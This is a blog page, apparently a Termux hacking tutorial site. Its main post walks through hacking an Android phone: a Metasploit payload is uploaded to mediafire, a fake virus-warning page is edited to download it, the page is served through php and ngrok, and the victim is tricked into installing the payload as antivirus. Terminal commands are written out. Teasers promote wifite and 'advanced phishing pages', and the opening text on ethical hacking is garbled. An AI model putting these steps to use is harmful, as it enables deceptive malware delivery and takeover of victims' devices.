Skip to main content

WHAT IS ETHICAL HACKING ?

Hacking—Definition, Types, Security, and the sky is the limit from there A regularly utilized hacking definition is the demonstration of giving and taking computerized gadgets and networks through unapproved admittance to a record or PC framework. Hacking isn't generally a malevolent demonstration, yet it is most ordinarily connected with criminal behavior and information robbery by digital lawbreakers.  Hacking alludes to the abuse of gadgets like PCs, cell phones, tablets, and organizations to make harm or degenerate frameworks, accumulate data on clients, take information and archives, or upset information related action.  A conventional perspective on programmers is a solitary rebel developer who is exceptionally gifted in coding and altering PC programming and equipment frameworks. Be that as it may, this tight view doesn't cover the genuine specialized nature of hacking. Programmers are progressively filling in refinement, utilizing covert assault strategies intended to ...

SEND PAYLOAD FROM FAKE PAGE AND HACK ANDROID

send payload from fake page and hack android

send payload from fake page and hack android- Hi guys if you are searching for send payload from fake page and hack android and searching for the best article to get the best explanation about send payload from fake page and hack android. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "send payload from fake page and hack android". By this article, you can get a lot of about send payload from fake page and hack android, fake template redirecting part 2, hack android from fake page, how to hack android from termux. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

send payload from fake page and hack android

Hello, guys iam back with another amazing post, so today in this post we will going to learn about how to hack android device from simple redirection trick which hackers use in advanced methods and we will going to use fake template i mean malware template to hack android to make victim think like that's a real virus. So let's get started.

#Follow Below Steps

Read All These Below Posts To Go Ahead.




1). I hope you read all the above mentioned posts clearly. Then make sure your payload is ready, and ngrok is starting successfully, and fake template is workng fine. 

2). Now, upload your metasploit payload to mediafire and get direct link by holding long click on green button, which looks like below example link.

Example:- https;//www.mediafire.com/file/payload.


Now, when you click on that type of link the payload will directly get downloaded and victim get's no idea about what app is he downloading if you change the payload icon, name, and sdk, versions. So after that he installs that and boom that's all you hacked him. So let's move ahead.

3). Open termux and create a new directory with tamper name.

# cd $HOME

mkdir tamper

And now move all fake template files into this directory. By following below codes, but before that make sure you extracted that folder in internal storage.

# cd /sdcard/update

# cp * $HOME/tamper

# cd $HOME/tamper

# ls

Now, here you can see all of the files and images in this folder,

4). Now open index.html into a nano editor or any code editor and search element https://temp-mail.org And replace that link with https;//www.mediafire.com/file/payload.apk 
with this link and save it.

5). Now open termux and open tamper directory and start php server,

# cd $HOME/tamper

# php -S localhost:5348

Now, here the php server starts on port 5348 now open another session in termux, And start ngrok with same port number.

# ./ngrok http 5348

here we need to portforward the link or else you can use 000webhost instead of termux. Now after that copy the link of ngrok which you can see on your terminal screen.

Example:- http://ngrok.io/tg5t73fsbknw

Now, send it to your victim and when he opens it the fake virus page will open and the payload will be downloaded when the web starts so after that the victim think that payload is antivirus for him he will surely install it and then boom now you hacked him successfully. Now you can do whatever you want with his device. So i hope you liked this post if yes then drop your thoughts regarding this post in comments section and share this post with you homies.


Comments

Popular posts from this blog

INFORMATION GATHERING FROM TERMUX OSINT TOOL

information gathering from termux osint tool information gathering from termux osint tool   -  Hi guys if you are searching for information gathering from termux osint tool and searching for the best article to get the best explanation about information gathering from termux osint tool. Then you are in the right place. Today I'm here going to share the step by step tutorial about " information gathering from termux osint tool ". By this article, you can get a lot of about   Information gathering from name and number, termux osint tool,  information gathering from termux osint tool, how to use little brother tool, littlebrother tool in termux .  And I'm damn sure that you will never get all these unique information like us on the internet anywhere else. information gathering from termux osint tool Hello, guys welcome in another amazing post so today let us know about how to hack or gather information like hacker from osint tool named little ...

HOW TO RUN WIFITE IN TERMUX

(ps: most of the times I uses my old smartphone for Termux tutorial making, that's an old arm device thus I was failed to use wifite in Termux but if you're interested then you can try) Here how you can install Wifite in Termux Step1: Firstly Install Termux from Play store Step2: Type these commands one by one # apt update && apt upgrade # Pkg install wget #  pkg install python2 Step3: Now type this Command:   #   wget https://raw.github.com/derv82/wifite/master/wifite.py Then type  chmod +x wifite.py Final Step: Now you're ready to use Wifite Just type # python2 wifite.py Thats it (It requires Superuser Permissions, if you're root then try installing sudo in Termux)

HOW TO CREATE AADVANVCED PHISHING PAGES FOR TERMUX

advanced phishing pages for termux tutorial advanced phishing pages for termux   -  Hi guys if you are searching for advanced phishing pages for termux and searching for the best article to get the best explanation about  Today I'm here going to share the step by step tutorial about " advanced phishing pages for termux ". By this article, you can get a lot of about   phishing page download .  And I'm damn sure that you will never get all these unique information like us on the internet anywhere else. advanced phishing pages for termux tutorial Hello, guys i am back with another amazing post so today we will get to know about the best and advanced phishing pages for termux and kali Linux users and i hope you will gonna like the scripts which we collected. So let's get started. what are advanced phishing pages Advanced phishing pages are phishing page's itself but they are new and real looking so that's why we can call them as advanced phishing p...